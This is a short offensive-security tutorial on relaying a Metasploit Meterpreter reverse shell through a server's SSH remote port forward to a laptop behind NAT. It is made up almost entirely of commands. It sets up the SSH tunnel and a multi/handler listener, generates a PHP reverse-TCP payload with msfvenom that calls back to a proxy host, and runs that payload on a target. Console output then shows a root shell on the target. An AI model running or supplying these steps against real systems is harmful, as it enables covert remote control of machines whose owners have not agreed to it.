Forwarding Meterpreter to your Laptop
Let's say we want to have a reverse shell (through Meterpreter), but we don't want to run metasploit on our servers. We want it on our laptop, but unfortunately, it did not have any front-facing public IP. In this article, I will show how to use our server as proxy to connect the reverse shell from our target to our laptop sitting behind NAT.
1
# setup ssh tunnel
2
laptop:$ ssh -R 0.0.0.0:8080:127.0.0.1:1337 -NF [email protected]_server
3
4
# listen for meterpreter connection
5
laptop:$ msfconsole
6
msf5 > use exploit/multi/handler
7
msf5 exploit(multi/handler) > set LHOST 127.0.0.1
8
msf5 exploit(multi/handler) > set LPORT 1337
9
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
10
msf5 exploit(multi/handler) > exploit -j
Copied!
Next let's generate payload and have our target execute it.
1
# generate payload
2
laptop:$ msfvenom -p php/meterpreter_reverse_tcp \
3
LHOST=proxy_server \
4
LPORT=8080 > payload
5
6
# move payload to target server
7
laptop:$ scp payload.php target:payload.php
8
9
# execute payload in target server
10
target:$ php payload.php
Copied!
Then boom
1
msf5 exploit(multi/handler) >
2
[*] Meterpreter session 1 opened
3
4
msf5 exploit(multi/handler) > sessions
5
6
Active sessions
7
===============
8
9
Id Name Type Information Connection
10
-- ---- ---- ----------- ----------
11
1 meterpreter php/linux root (0) @ f62342bbe4ce 127.0.0.1:1337 -> 127.0.0.1:51306 (127.0.0.1)
12
13
msf5 exploit(multi/handler) > sessions 1
14
[*] Starting interaction with 1...
15
16
meterpreter > shell
17
Process 121 created.
18
19
whoami
20
root
Copied!
Last modified 4mo ago
Copy link